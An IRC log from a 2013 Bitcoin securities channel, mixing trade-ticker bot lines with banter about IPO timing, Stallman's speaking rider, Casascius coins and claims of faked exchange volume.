Wikipedia, the free encyclopedia: ; British Museum - The Lycurgus Cup: ; The Lycurgus Cup – A Roman Nanotechnology - Arne-lueker.de: Sep 11 18:31:48 better write yourself into Eulora Sep 11 18:32:09 "nubbins` has obtained the chalice of popescu!" Sep 11 18:32:09 lol how? Sep 11 18:32:31 "it increases his rationality by 20 points!" Sep 11 18:33:13 yes but the question is how :D Sep 11 18:33:36 [BTCTC] [DMS.SELLING] 167 @ 0.00949 = 1.5848 BTC [-] Sep 11 18:33:51 just like the lycurgus cup, but with your face engraved in the side Sep 11 18:33:51 [BTCTC] [COGNITIVE] 1 @ 0.3085 BTC [-] Sep 11 18:34:13 [BTCTC] [TAT.VIRTUALMINE] 623 @ 0.00061 = 0.38 BTC [+] Sep 11 18:34:25 [BTCTC] [DMS.PURCHASE] 167 @ 0.01203 = 2.009 BTC [-] Sep 11 18:34:31 maybe it magically fills itself with your blood or something Sep 11 18:34:41 [BTCTC] [DMS.PURCHASE] 200 @ 0.01203 = 2.406 BTC [-] Sep 11 18:35:06 [HAVELOCK] [CBTC] 6120 @ 0.00044 = 2.6928 BTC [+] Sep 11 18:35:20 [HAVELOCK] [CBTC] 2000 @ 0.00045999 = 0.92 BTC [+] Sep 11 18:35:28 you'll need those Sep 11 18:35:36 [BTCTC] [DMS.PURCHASE] 18 @ 0.01203 = 0.2165 BTC [-] Sep 11 18:35:46 [HAVELOCK] [CBTC] 2000 @ 0.00045999 = 0.92 BTC [+] Sep 11 18:35:55 [HAVELOCK] [CBTC] 1000 @ 0.00045999 = 0.46 BTC [+] Sep 11 18:35:56 ^^^ Sep 11 18:35:59 [BTCTC] [DMS.MINING] 20 @ 0.00269 = 0.0538 BTC [+] Sep 11 18:36:00 [BTCTC] [DMS.MINING] 380 @ 0.002699 = 1.0256 BTC [+] Sep 11 18:36:04 4.6x par Sep 11 18:36:08 [HAVELOCK] [CBTC] 1000 @ 0.000459 = 0.459 BTC [-] Sep 11 18:36:10 uh. no Sep 11 18:36:12 why would mp need anyone's blood? it's well established he moved out of transylvania long ago Sep 11 18:36:17 [BTCTC] [DMS.PURCHASE] 1 @ 0.01203 BTC [-] Sep 11 18:36:19 2.3x par Sep 11 18:36:44 [HAVELOCK] [CBTC] 1000 @ 0.000459 = 0.459 BTC [-] Sep 11 18:36:49 Still *ania, still mildly suspicious Sep 11 18:37:00 what *ania ? Sep 11 18:37:02 we'd need dental records to be certain Sep 11 18:37:49 transylvania, romania, etc Sep 11 18:38:46 [HAVELOCK] [AM100] 57 @ 0.02119 = 1.2078 BTC [-] Sep 11 18:39:26 o Sep 11 18:39:33 question, considering all the world, what do you think the best time of day for an IPO is? Sep 11 18:39:44 noon EST Sep 11 18:39:55 prolly around there Sep 11 18:40:05 doesn't make much difference, i recall people were like staying up for the bitbet one Sep 11 18:40:16 yeah Sep 11 18:40:23 noon in your local time zone Sep 11 18:40:30 hmm Sep 11 18:40:51 no sense staying up until 4am to make sure your own IPO doesn't fuck up Sep 11 18:40:59 do it during business hours Sep 11 18:41:01 that's a very good point. Sep 11 18:41:15 also, i am eating some excellent peaches. Sep 11 18:41:25 thanks, i have occasional moments of clarity Sep 11 18:41:25 well there are a lot of hours during business time Sep 11 18:41:30 let this be noted in the permanent record. Sep 11 18:42:13 ThickAsThieves: put another way, if you were scheduling a meeting, what time would you schedule it for? Sep 11 18:42:24 don't be the dick that schedules it for 9am or 4:30pm Sep 11 18:42:40 [BTCTC] [BASIC-MINING] 4 @ 0.1297 = 0.5188 BTC [+] Sep 11 18:42:40 no earlier than 10am, no later than 3pm Sep 11 18:44:04 lol Sep 11 18:44:12 i always ask the other person Sep 11 18:44:13 api fail Sep 11 18:44:16 what they want Sep 11 18:44:16 heh Sep 11 18:44:20 been offline for 24hrs+ Sep 11 18:44:23 that's a safe way to do it Sep 11 18:44:32 this is how ThickAsThieves gets laid all the time. he asks the op what they want, Sep 11 18:44:40 the op takes it as a signal to give the couch audition, Sep 11 18:44:42 all is well. Sep 11 18:44:43 noon is nice, if for no other reason than the fact that it has its own word Sep 11 18:44:55 nubbins: which noon? what if the meeting has someone from America, Europe and Asia? Sep 11 18:45:03 chaang-noi np, you know css has priorities Sep 11 18:45:10 [BTCTC] [BASIC-MINING] 3 @ 0.1298 = 0.3894 BTC [+] Sep 11 18:45:11 nubbins` baboon also has its own word. jus' sayin. Sep 11 18:45:12 noon UTC is very fine here :) Sep 11 18:45:28 jurov: in that case, someone's going to be on Skype wearing their pyjamas Sep 11 18:45:42 fact : 50% of people on skype are naked from the waist down. Sep 11 18:45:48 as i see it, the time should be chosen by whom the highest volume audience is, and their most likely availability Sep 11 18:46:02 ThickAsThieves: that's a reasonable compromise Sep 11 18:46:09 [BTCTC] [BASIC-MINING] 8 @ 0.13 = 1.04 BTC [+] Sep 11 18:46:21 mircea_popescu: the ipo will be held on september 13th at baboon o'clock Sep 11 18:46:22 ThickAsThieves no, the price should be chosen so that it won't get flipped in 10 minutes Sep 11 18:46:33 or well i guess you'd just say "at baboon" Sep 11 18:46:40 nubbins` o'cock. Sep 11 18:46:42 i agree jurov Sep 11 18:47:11 and things that are worth only 500btc should not be doing an "IPO" Sep 11 18:47:18 but those are different topics Sep 11 18:47:42 heh Sep 11 18:47:44 ThickAsThieves eh stop worrying, just wrap. Sep 11 18:47:47 i'm gonna ipo my lunch Sep 11 18:47:54 all shareholders get to watch me eat it Sep 11 18:48:00 measure twice Sep 11 18:48:10 is worrying now? Sep 11 18:48:31 well i have no way of knowing wtf you're doing lol. anyway. Sep 11 18:48:34 well, why not? if they are really worth 500btc but undersell for 100.. then you can't have best time Sep 11 18:48:55 and if they are really worth only 100, don't worry about the retards timezone Sep 11 18:48:59 http://imgur.com/OZ6b2iN Sep 11 18:49:01 imgur: the simple image sharer Sep 11 18:49:11 it's your IPO, pick a time that suits you Sep 11 18:49:21 people make mistakes when they're tired Sep 11 18:49:43 lol, so make sure its the worst possible time for everyone but me? Sep 11 18:50:03 i'm sure there are at least SOME people in your timezone Sep 11 18:50:18 surely Sep 11 18:50:19 yes ThickAsThieves, i do have *you* in mind when sellin idiffs :D Sep 11 18:50:21 oh, wait, i see Sep 11 18:50:22 heh Sep 11 18:50:36 [HAVELOCK] [AM100] 5 @ 0.02139 = 0.107 BTC [+] Sep 11 18:50:36 yes, figure out your target market, and IPO when they should all be in bed Sep 11 18:50:38 [HAVELOCK] [AM100] 25 @ 0.0214 = 0.535 BTC [+] Sep 11 18:50:47 just to establish dominance Sep 11 18:51:10 lol Sep 11 18:51:24 [HAVELOCK] [AM100] 5 @ 0.0215 = 0.1075 BTC [+] Sep 11 18:51:27 [HAVELOCK] [AM100] 35 @ 0.02155 = 0.7543 BTC [+] Sep 11 18:51:34 i'd say majority holders are in US & CN Sep 11 18:51:34 [HAVELOCK] [AM1] 6 @ 2.29 = 13.74 BTC [+] Sep 11 18:51:36 [BTCTC] [DMS.PURCHASE] 1 @ 0.01203 BTC [-] Sep 11 18:51:44 agreed Sep 11 18:51:58 however, neobee will likely appeal a bit more to euros Sep 11 18:51:59 [BTCTC] [LABCOIN] 9 @ 0.003618 = 0.0326 BTC [-] Sep 11 18:52:00 [BTCTC] [LABCOIN] 305 @ 0.003619 = 1.1038 BTC [+] Sep 11 18:52:02 [BTCTC] [LABCOIN] 700 @ 0.00362 = 2.534 BTC [+] Sep 11 18:52:03 [BTCTC] [LABCOIN] 50 @ 0.003625 = 0.1813 BTC [+] Sep 11 18:52:04 [BTCTC] [LABCOIN] 1636 @ 0.003653 = 5.9763 BTC [+] Sep 11 18:52:27 well, 10am EST is 10pm CST Sep 11 18:52:46 is 3pm in london Sep 11 18:53:04 all hours when reasonable people are awake Sep 11 18:53:18 and at work Sep 11 18:53:22 yep Sep 11 18:53:42 [HAVELOCK] [LABCO] 30 @ 0.00301 = 0.0903 BTC [-] Sep 11 18:53:47 people make time for things they want Sep 11 18:53:50 i'm thinking 1pm EST Sep 11 18:54:08 1pm EST, 1am in China, 6pm in London Sep 11 18:54:24 everyone is either at work or asleep :P Sep 11 18:54:29 or commuting home Sep 11 18:54:44 that's inconvenient for everyone. i think we've got a winner Sep 11 18:54:51 who are we kidding all bitcoiners work from home Sep 11 18:55:04 i haven't been inside an office in 6 months Sep 11 18:56:26 [BTCTC] [ASICMINER-PT] 1 @ 2.301 BTC [-] Sep 11 18:56:27 [BTCTC] [ASICMINER-PT] 1 @ 2.301 BTC [-] Sep 11 18:56:29 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Sep 11 18:56:41 [BTCTC] [LABCOIN] 5 @ 0.003652 = 0.0183 BTC [-] Sep 11 18:56:41 [BTCTC] [LABCOIN] 1633 @ 0.003653 = 5.9653 BTC [+] Sep 11 18:57:09 [BTCTC] [ASICMINER-PT] 1 @ 2.3 BTC [-] Sep 11 18:57:26 jcpham|twrk: what's that coin in the middle? Sep 11 18:57:50 http://www.youtube.com/watch?v=WM8mKMtEg7M&feature=youtu.be&t=2m7s Sep 11 18:57:52 Richard Stallman Goes Crazy and Freaks Out - YouTube Sep 11 18:58:53 [BTCTC] [ASICMINER-PT] 2 @ 2.3 = 4.6 BTC [-] Sep 11 18:59:11 lel Sep 11 18:59:14 stallman is fucked Sep 11 18:59:18 ever read his rider? Sep 11 18:59:37 i never read any riders Sep 11 19:00:16 [BTCTC] [ASICMINER-PT] 1 @ 2.286 BTC [-] Sep 11 19:00:18 [BTCTC] [ASICMINER-PT] 2 @ 2.285 = 4.57 BTC [-] Sep 11 19:00:38 it's crazy Sep 11 19:00:39 "If you can find a host for me that has a friendly parrot, I will be very very glad. If you can find someone who has a friendly parrot I can visit with, that will be nice too." Sep 11 19:00:46 "DON'T buy a parrot figuring that it will be a fun surprise for me. To acquire a parrot is a major decision: it is likely to outlive you. If you don't know how to treat the parrot, it could be emotionally scarred and spend many decades feeling frightened and unhappy. If you buy a captured wild parrot, you will promote a cruel and devastating practice, and the parrot will be emotionally scarred befo Sep 11 19:00:47 you get it. Meeting that sad animal is not an agreeable surprise." Sep 11 19:01:06 wow, he's freaking in that video Sep 11 19:01:19 weeping about failure Sep 11 19:01:27 [BTCTC] [ASICMINER-PT] 2 @ 2.285 = 4.57 BTC [-] Sep 11 19:01:28 Sep 16 01:12:28 Diablo-D3 because by now not that many people can be bothered to invite him anywhere. Sep 11 19:01:45 little has changed in a year obviously. Sep 11 19:02:00 [HAVELOCK] [CBTC] 130 @ 0.00045899 = 0.0597 BTC [-] Sep 11 19:03:21 "Food: Sep 11 19:03:22 I do not eat breakfast. Please do not ask me any questions about Sep 11 19:03:23 what I will do breakfast. Please just do not bring it up." Sep 11 19:03:27 woops Sep 11 19:03:58 someone should invite rms, then feed him parrot stu for breakfast Sep 11 19:04:05 what's the worst that can happen ? Sep 11 19:04:06 heh Sep 11 19:04:16 [HAVELOCK] [CBTC] 4870 @ 0.00045899 = 2.2353 BTC [-] Sep 11 19:04:17 he will rant about how "horrible" he feels Sep 11 19:04:18 [HAVELOCK] [CBTC] 4000 @ 0.000459 = 1.836 BTC [+] Sep 11 19:04:20 [HAVELOCK] [CBTC] 100 @ 0.00046 = 0.046 BTC [+] Sep 11 19:04:22 [HAVELOCK] [CBTC] 10000 @ 0.00046 = 4.6 BTC [+] Sep 11 19:04:24 a ok. Sep 11 19:04:25 [HAVELOCK] [CBTC] 10000 @ 0.00048 = 4.8 BTC [+] Sep 11 19:04:27 [HAVELOCK] [CBTC] 1000 @ 0.000484 = 0.484 BTC [+] Sep 11 19:04:28 [HAVELOCK] [CBTC] 5000 @ 0.00049999 = 2.5 BTC [+] Sep 11 19:04:30 [HAVELOCK] [CBTC] 1030 @ 0.0005 = 0.515 BTC [+] Sep 11 19:04:43 if you give him a microphone, he may beat it against a table Sep 11 19:04:55 no cutting, no poetry ? Sep 11 19:04:57 cbtc is such an amazing company Sep 11 19:04:57 [HAVELOCK] [CBTC] 3000 @ 0.0005 = 1.5 BTC [+] Sep 11 19:05:09 [HAVELOCK] [CBTC] 3 @ 0.0005 = 0.0015 BTC [+] Sep 11 19:05:28 i think he cuts himself in private Sep 11 19:05:35 ThickAsThieves: apparently Sep 11 19:05:43 [HAVELOCK] [CBTC] 28 @ 0.0005 = 0.014 BTC [+] Sep 11 19:05:57 [BTCTC] [DMS.MINING] 1 @ 0.002698 BTC [-] Sep 11 19:06:40 AM div = 0.01355608 Sep 11 19:06:41 [BTCTC] [ASICMINER-PT] 1 @ 2.282 BTC [-] Sep 11 19:06:42 [BTCTC] [ASICMINER-PT] 2 @ 2.281 = 4.562 BTC [-] Sep 11 19:07:19 not bad Sep 11 19:07:23 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0006298 = 0.0019 BTC [+] Sep 11 19:07:52 ThickAsThieves i guess we get to see how completely divorced from fundamentals teh "investors" are trading. Sep 11 19:08:19 [HAVELOCK] [AM100] 10 @ 0.021191 = 0.2119 BTC [-] Sep 11 19:08:21 [HAVELOCK] [AM100] 50 @ 0.02119 = 1.0595 BTC [-] Sep 11 19:08:32 [HAVELOCK] [AM100] 22 @ 0.0215 = 0.473 BTC [+] Sep 11 19:09:33 [HAVELOCK] [AM100] 45 @ 0.0215 = 0.9675 BTC [+] Sep 11 19:09:36 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0006298 = 0.0013 BTC [+] Sep 11 19:09:40 i'd probably exchange some xbond for neobee if i didn't have to pay 1 btc to do so Sep 11 19:10:32 I think the div will result in another week of the same Sep 11 19:10:43 what? Sep 11 19:10:59 2.1-2.35ish trading Sep 11 19:11:07 http://it.slashdot.org/story/13/09/11/1224252/are-the-nist-standard-elliptic-curves-back-doored Sep 11 19:11:14 Are the NIST Standard Elliptic Curves Back-doored? - Slashdot Sep 11 19:11:27 nubbins, the 1btc might make sense if you were buying ebough Sep 11 19:11:42 but generally there are plenty options Sep 11 19:11:54 people will of course complain about the missing ones regardless Sep 11 19:11:57 parrot stew sounds good, I would eat it Sep 11 19:12:05 yeah Sep 11 19:12:17 [HAVELOCK] [CBTC] 700 @ 0.0005 = 0.35 BTC [+] Sep 11 19:12:23 no fee means you'd spend all your time xferring shares Sep 11 19:12:40 [BTCTC] [ACTIVEMINING] 10 @ 0.003431 = 0.0343 BTC [-] Sep 11 19:12:42 [HAVELOCK] [CBTC] 100 @ 0.0005 = 0.05 BTC [+] Sep 11 19:12:51 [HAVELOCK] [CBTC] 100 @ 0.0005 = 0.05 BTC [+] Sep 11 19:13:03 right, people can skim .0001 btc per day on their own time Sep 11 19:13:25 [HAVELOCK] [CBTC] 50 @ 0.0005 = 0.025 BTC [+] Sep 11 19:13:32 [HAVELOCK] [AM100] 10 @ 0.02149 = 0.2149 BTC [-] Sep 11 19:13:42 [HAVELOCK] [AM100] 33 @ 0.0215 = 0.7095 BTC [+] Sep 11 19:13:44 [HAVELOCK] [CBTC] 1000 @ 0.0005 = 0.5 BTC [+] Sep 11 19:13:55 [HAVELOCK] [CBTC] 50 @ 0.0005 = 0.025 BTC [+] Sep 11 19:13:57 anyway, xbond is nice to hold Sep 11 19:14:24 [HAVELOCK] [AM100] 127 @ 0.02155 = 2.7369 BTC [+] Sep 11 19:14:46 probably the last 18.25% AY you'll see Sep 11 19:14:54 [HAVELOCK] [CBTC] 50 @ 0.0005 = 0.025 BTC [+] Sep 11 19:14:58 yeah Sep 11 19:15:06 [HAVELOCK] [CBTC] 10 @ 0.0005 = 0.005 BTC [+] Sep 11 19:16:05 [BTCTC] [DMS.PURCHASE] 1 @ 0.012 BTC [-] Sep 11 19:16:16 nubbins` that's one of the recalescene coins Sep 11 19:16:21 might have spelled that wrong Sep 11 19:16:30 #114 is mine all mine Sep 11 19:16:30 looks pretty Sep 11 19:16:41 i like the deisgn on it Sep 11 19:16:46 yeah Sep 11 19:16:46 it's shiny Sep 11 19:16:54 i'm a big fan of silver Sep 11 19:17:02 the edge is smooth also Sep 11 19:17:06 instead of ribbed Sep 11 19:17:06 makes a nice "ding" when you toss it with your thumb Sep 11 19:17:25 [BTCTC] [ACTIVEMINING] 6 @ 0.003382 = 0.0203 BTC [-] Sep 11 19:17:26 [BTCTC] [ACTIVEMINING] 10 @ 0.003381 = 0.0338 BTC [-] Sep 11 19:17:28 [BTCTC] [ACTIVEMINING] 14 @ 0.003379 = 0.0473 BTC [-] Sep 11 19:17:29 [BTCTC] [ACTIVEMINING] 99 @ 0.003335 = 0.3302 BTC [-] Sep 11 19:17:30 [BTCTC] [ACTIVEMINING] 76 @ 0.003334 = 0.2534 BTC [-] Sep 11 19:17:30 [BTCTC] [ACTIVEMINING] 321 @ 0.003333 = 1.0699 BTC [-] Sep 11 19:17:31 [BTCTC] [ACTIVEMINING] 332 @ 0.003321 = 1.1026 BTC [-] Sep 11 19:17:47 i snag up good deals otc when i spot them Sep 11 19:18:16 i'm still glad i bought a roll of those rare 0.5oz casascius silvers Sep 11 19:18:34 [HAVELOCK] [AM100] 10 @ 0.02155 = 0.2155 BTC [+] Sep 11 19:18:49 only problem is that i want to touch them with my bare hands, but can't ;| Sep 11 19:18:57 [BTCTC] [DMS.MINING] 8 @ 0.002698 = 0.0216 BTC [-] Sep 11 19:18:58 [HAVELOCK] [CBTC] 2 @ 0.0005 = 0.001 BTC [+] Sep 11 19:19:33 [HAVELOCK] [AM100] 45 @ 0.021777 = 0.98 BTC [+] Sep 11 19:19:36 [BTCTC] [DMS.MINING] 1 @ 0.002698 BTC [-] Sep 11 19:20:05 i've been trying to complete a cas 2011 set Sep 11 19:20:11 but the 1btc misprint are so high Sep 11 19:20:18 i have the 10 and 25 already Sep 11 19:20:28 i bought a 1 btc error a couple weeks ago Sep 11 19:20:33 they're not cheap Sep 11 19:20:34 and the 2011's without the misprint are rare too Sep 11 19:20:43 [BTCTC] [ASICMINER-PT] 1 @ 2.27 BTC [-] Sep 11 19:20:45 [BTCTC] [ASICMINER-PT] 2 @ 2.252 = 4.504 BTC [-] Sep 11 19:20:46 [BTCTC] [ASICMINER-PT] 3 @ 2.251 = 6.753 BTC [-] Sep 11 19:20:47 [BTCTC] [ASICMINER-PT] 5 @ 2.25 = 11.25 BTC [-] Sep 11 19:20:48 [BTCTC] [ASICMINER-PT] 2 @ 2.231 = 4.462 BTC [-] Sep 11 19:20:49 [BTCTC] [ASICMINER-PT] 1 @ 2.231 BTC [-] Sep 11 19:20:50 [BTCTC] [ASICMINER-PT] 4 @ 2.23 = 8.92 BTC [-] Sep 11 19:21:26 [BTCTC] [DMS.MINING] 1 @ 0.002698 BTC [-] Sep 11 19:21:40 yeah Sep 11 19:21:49 behold, the most rare of all casascius coins: Sep 11 19:22:03 "In addition we produced 45 half-BTC coins with the series-2 sticker which were not numbered into these rolls. These were available to those who made initial orders, though are no longer available for sale." Sep 11 19:22:14 http://casascius.wordpress.com/2013/07/23/status-on-silver-coins-july-23/ Sep 11 19:22:19 Status on Silver Coins (July 23) | casascius Sep 11 19:23:58 [BTCTC] [LABCOIN] 50 @ 0.003665 = 0.1833 BTC [+] Sep 11 19:24:11 [BTCTC] [DMS.PURCHASE] 230 @ 0.012 = 2.76 BTC [-] Sep 11 19:24:15 [BTCTC] [LABCOIN] 50 @ 0.003665 = 0.1833 BTC [+] Sep 11 19:27:14 [HAVELOCK] [CBTC] 3877 @ 0.0005 = 1.9385 BTC [+] Sep 11 19:29:26 [BTCTC] [ACTIVEMINING] 100 @ 0.003464 = 0.3464 BTC [+] Sep 11 19:29:28 [BTCTC] [ACTIVEMINING] 50 @ 0.003465 = 0.1733 BTC [+] Sep 11 19:29:29 [BTCTC] [ACTIVEMINING] 5 @ 0.003469 = 0.0173 BTC [+] Sep 11 19:29:30 [BTCTC] [ACTIVEMINING] 10 @ 0.00347 = 0.0347 BTC [+] Sep 11 19:29:31 [BTCTC] [ACTIVEMINING] 270 @ 0.003496 = 0.9439 BTC [+] Sep 11 19:29:31 [BTCTC] [ACTIVEMINING] 2000 @ 0.0035 = 7 BTC [+] Sep 11 19:29:32 [BTCTC] [ACTIVEMINING] 200 @ 0.003587 = 0.7174 BTC [+] Sep 11 19:29:34 [BTCTC] [ACTIVEMINING] 10 @ 0.003588 = 0.0359 BTC [+] Sep 11 19:29:35 [BTCTC] [ACTIVEMINING] 100 @ 0.003588 = 0.3588 BTC [+] Sep 11 19:29:36 [BTCTC] [ACTIVEMINING] 1 @ 0.0036 BTC [+] Sep 11 19:29:37 [BTCTC] [ACTIVEMINING] 46 @ 0.0036 = 0.1656 BTC [+] Sep 11 19:29:42 [BTCTC] [ACTIVEMINING] 270 @ 0.0036 = 0.972 BTC [+] Sep 11 19:30:04 o look, asicminer beat on dividend and so activeminer surges. LOGC!! Sep 11 19:30:19 [MPEX] [S.MPOE] 5546 @ 0.00089399 = 4.9581 BTC [+] Sep 11 19:30:21 [BTCTC] [LABCOIN] 2 @ 0.003667 = 0.0073 BTC [+] Sep 11 19:30:25 [MPEX] [S.MPOE] 7530 @ 0.00089418 = 6.7332 BTC [+] Sep 11 19:30:35 pocket change Sep 11 19:30:41 [BTCTC] [ACTIVEMINING] 201 @ 0.003607 = 0.725 BTC [+] Sep 11 19:30:42 [BTCTC] [ACTIVEMINING] 200 @ 0.00361 = 0.722 BTC [+] Sep 11 19:30:43 [BTCTC] [ACTIVEMINING] 50 @ 0.00361 = 0.1805 BTC [+] Sep 11 19:30:44 [BTCTC] [ACTIVEMINING] 675 @ 0.003635 = 2.4536 BTC [+] Sep 11 19:30:45 [BTCTC] [ACTIVEMINING] 812 @ 0.00365 = 2.9638 BTC [+] Sep 11 19:32:26 https://bitcointalk.org/index.php?topic=291274.msg3118339#msg3118339 Sep 11 19:32:33 Hey Activeminers? You won't make your investment back. Sep 11 19:32:42 "Historically most BTC securities trade happened on MPEx. Some scammers are faking the volumes currently, making that measure not particularly useful, but nevertheless…" Sep 11 19:32:55 [BTCTC] [DMS.MINING] 16 @ 0.00256 = 0.041 BTC [-] Sep 11 19:32:56 [BTCTC] [DMS.MINING] 41 @ 0.002559 = 0.1049 BTC [-] Sep 11 19:32:57 [BTCTC] [DMS.MINING] 16 @ 0.002558 = 0.0409 BTC [-] Sep 11 19:33:06 sacmmers faking volume on mpex? Sep 11 19:33:08 i need to take a shit, but maybe while i'm gone, someone can explain what is to be gained by faking volume on an exchange Sep 11 19:33:24 very interested in any hints of that Sep 11 19:33:30 scammers* Sep 11 19:33:36 the popularity contest, i guess Sep 11 19:34:12 that would be a reason for YOU to fake volume, not some random user Sep 11 19:34:34 that you then can claim that your broken insecure piee of crud is "betteR" than any other random broken insecure piece of crud Sep 11 19:34:40 on the basis of "more volume!!!" Sep 11 19:34:58 how would you expect three websites posing as exchanges to differentiate ? Sep 11 19:35:10 secure they can't be. run by experts they are not. what is left ? Sep 11 19:36:51 nubbins` glbse worked with goat and "the bankers" to fake volumes. Sep 11 19:37:05 the "random user" got to pretend like "everyone's investing in pirate" as a sell point. Sep 11 19:37:16 the "exchange" got ot pretend like it exists and it matters. Sep 11 19:37:28 it's a natural fit. Sep 11 19:38:20 oh, wait, i misunderstood the original statement Sep 11 19:38:51 she's saying that some scammers are faking the volume on OTHER exchanges? Sep 11 19:39:06 why do you think activeminer exists in the first place ? Sep 11 19:39:09 it reads like the volume is being faked on mpex Sep 11 19:39:11 lololol Sep 11 19:39:54 what are the odds that goat gets named in the pirate case? Sep 11 19:39:59 lol i guess you could read it that way if you wanted to. Sep 11 19:40:09 benkay no idea. i think there's a bet about it Sep 11 19:40:22 o nm, the bet is abotu gigavps. Sep 11 19:40:27 yeah Sep 11 19:40:31 that did give me the idea, though. Sep 11 19:40:36 "x happens on mpex. some scammers are faking volume." Sep 11 19:40:39 either way Sep 11 19:40:51 goat hasnt been around recently lol Sep 11 19:41:01 chaang-noi: Sep 11 19:41:03 i'd be surprised if any given security was more than 60% real volume Sep 11 19:41:28 ;;seen chaang-noi Sep 11 19:41:28 chaang-noi was last seen in #bitcoin-assets 54 minutes and 58 seconds ago: i know we both hate gox:) Sep 11 19:41:29 some obviously far less Sep 11 19:41:37 lolol Sep 11 19:41:43 my timing el bado Sep 11 19:41:56 he hasnt been around much Sep 11 19:42:10 saw some posts from him in cognitive thread Sep 11 19:42:17 anyway, being in some random azn country and not a national prolly insulates him Sep 11 19:43:54 he could find it unpleasant to visit the us in the future Sep 11 19:44:11 possibly. Sep 11 19:44:16 he could also be competent enough to bypass the filter. Sep 11 19:44:16 sounds like he's happy where he is Sep 11 19:44:18 who knows. Sep 11 19:44:24 he does visit the US, TAT. Sep 11 19:44:27 oh Sep 11 19:44:43 he was on some grand bitlol tour recently Sep 11 19:45:11 in practice it's a good idea to take what the goat says at about half mast. Sep 11 19:45:23 only slightly arousing? Sep 11 19:45:27 [BTCTC] [DMS.PURCHASE] 10 @ 0.012 = 0.12 BTC [-] Sep 11 19:45:39 back a year ago he was supposedly running a mining operation for about a year during which time he never found a moment to document it, Sep 11 19:45:42 even when asked to do so. Sep 11 19:45:57 it's one of those narcisiac cases where a lot of shit gets made up and mixed up into the message. Sep 11 19:46:20 [BTCTC] [LABCOIN] 3 @ 0.003667 = 0.011 BTC [+] Sep 11 19:46:34 [BTCTC] [LABCOIN] 7 @ 0.003667 = 0.0257 BTC [+] Sep 11 19:46:56 being newer, i can say he isnt so bad when he tries to hold a normal conversation or pump somehting, Sep 11 19:47:06 [HAVELOCK] [CBTC] 250 @ 0.00052 = 0.13 BTC [+] Sep 11 19:47:12 but he retreated to consistent trolling and annoyingness in recent mos Sep 11 19:47:35 or when ISNT trying to pump somehting* Sep 11 19:47:36 [BTCTC] [LABCOIN] 10 @ 0.003668 = 0.0367 BTC [+] Sep 11 19:47:43 a now that made more sense Sep 11 19:47:49 i was sitting here trying to wtf. Sep 11 19:47:52 hehe Sep 11 19:47:58 gotta preciate them pumpers! Sep 11 19:48:01 [HAVELOCK] [XBOND] 741 @ 0.001177 = 0.8722 BTC [+] Sep 11 19:48:26 [HAVELOCK] [CBTC] 200 @ 0.00052 = 0.104 BTC [+] Sep 11 19:48:32 he bought a bunch of t-shirts from me, no problems here ;p Sep 11 19:48:34 [HAVELOCK] [CBTC] 9 @ 0.00052 = 0.0047 BTC [+] Sep 11 19:48:35 for our daily philosophy read, today we have Sep 11 19:48:36 The strata of the earth preserve in rows the creatures which lived in former ages; and the array of books on the shelves of a library stores up in like manner the errors of the past and the way in which they have been exposed. Like those creatures, they too were full of life in their time, and made a great deal of noise; but now they are stiff and fossilized, and an object of curiosity to the literary palaeontologist a Sep 11 19:48:36 lone. Sep 11 19:48:36 Herodotus relates that Xerxes wept at the sight of his army, which stretched further than the eye could reach, in the thought that of all these, after a hundred years, not one would be alive. And in looking over a huge catalogue of new books, one might weep at thinking that, when ten years have passed, not one of them will be heard of. Sep 11 19:48:41 [HAVELOCK] [CBTC] 41 @ 0.000575 = 0.0236 BTC [+] Sep 11 19:48:44 [BTCTC] [DMS.SELLING] 1 @ 0.009649 BTC [+] Sep 11 19:48:57 [HAVELOCK] [CBTC] 100 @ 0.000575 = 0.0575 BTC [+] Sep 11 19:49:10 [HAVELOCK] [CBTC] 100 @ 0.000575 = 0.0575 BTC [+] Sep 11 19:49:12 It is in literature as in life: wherever you turn, you stumble at once upon the incorrigible mob of humanity, swarming in all directions, crowding and soiling everything, like flies in summer. Hence the number, which no man can count, of bad books, those rank weeds of literature, which draw nourishment from the corn and choke it. Sep 11 19:49:31 [HAVELOCK] [CBTC] 9 @ 0.00055 = 0.005 BTC [-] Sep 11 19:49:43 [HAVELOCK] [CBTC] 1 @ 0.00055 BTC [-] Sep 11 19:49:56 where's the philosphy in that? Sep 11 19:50:05 the philosophy is in the author :D Sep 11 19:50:06 seems a melancholy observation to me Sep 11 19:50:25 [BTCTC] [DMS.PURCHASE] 1 @ 0.012 BTC [-] Sep 11 19:50:59 [MPEX] [S.MPOE] 3050 @ 0.00089243 = 2.7219 BTC [-] Sep 11 19:51:01 [MPEX] [S.MPOE] 8250 @ 0.00089029 = 7.3449 BTC [-] Sep 11 19:51:31 TLDR we're just a buncha things doing things that dont mean much to future things, other then the ones paying attention, but theyre just a buncha things too Sep 11 19:51:41 [BTCTC] [TAT.MINIGAME] 14 @ 0.000249 = 0.0035 BTC [+] Sep 11 19:51:42 [BTCTC] [TAT.MINIGAME] 1000 @ 0.000249 = 0.249 BTC [+] Sep 11 19:51:43 [BTCTC] [TAT.MINIGAME] 500 @ 0.00025 = 0.125 BTC [+] Sep 11 19:51:44 than* Sep 11 19:51:55 it actually comes from a treatise on religion of all things. Sep 11 19:52:07 lovely prose Sep 11 19:52:33 [BTCTC] [DMS.PURCHASE] 1 @ 0.012 BTC [-] Sep 11 19:52:37 but kinda devolves into a beat-off at the end Sep 11 19:52:46 the prose is mostly tb saunders Sep 11 19:52:48 [BTCTC] [LABCOIN] 2 @ 0.003668 = 0.0073 BTC [+] Sep 11 19:53:00 those rank weeds of literature! cried the guy writing a poem about the way things are Sep 11 19:53:38 you could pretty much replace writer with fund operator and the whole thing would be about btctalk forums Sep 11 19:53:39 Modern history has demonstrated that if you sprinkle LSD or psychedelic mushrooms over a major city, then flower children will blossom and form drum circles and begin to reproduce. But close observation of modern psychedelic subcultures reveals that radical identity reinvention is not a function of spiritual freedom or political subversion, but is more a viral form of tribal bonding and indoctrination. Sep 11 19:53:45 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.000631 = 0.0019 BTC [+] Sep 11 19:54:00 *pfffff* whoa man Sep 11 19:54:07 goes back to yesterday -- don't make self-validating lists Sep 11 19:54:23 [BTCTC] [DMS.MINING] 1 @ 0.00255 BTC [-] Sep 11 19:54:56 [BTCTC] [DMS.MINING] 4 @ 0.002599 = 0.0104 BTC [+] Sep 11 19:56:12 james kent. who knew. Sep 11 19:57:31 jurov you've been reading some weird shit Sep 11 19:58:31 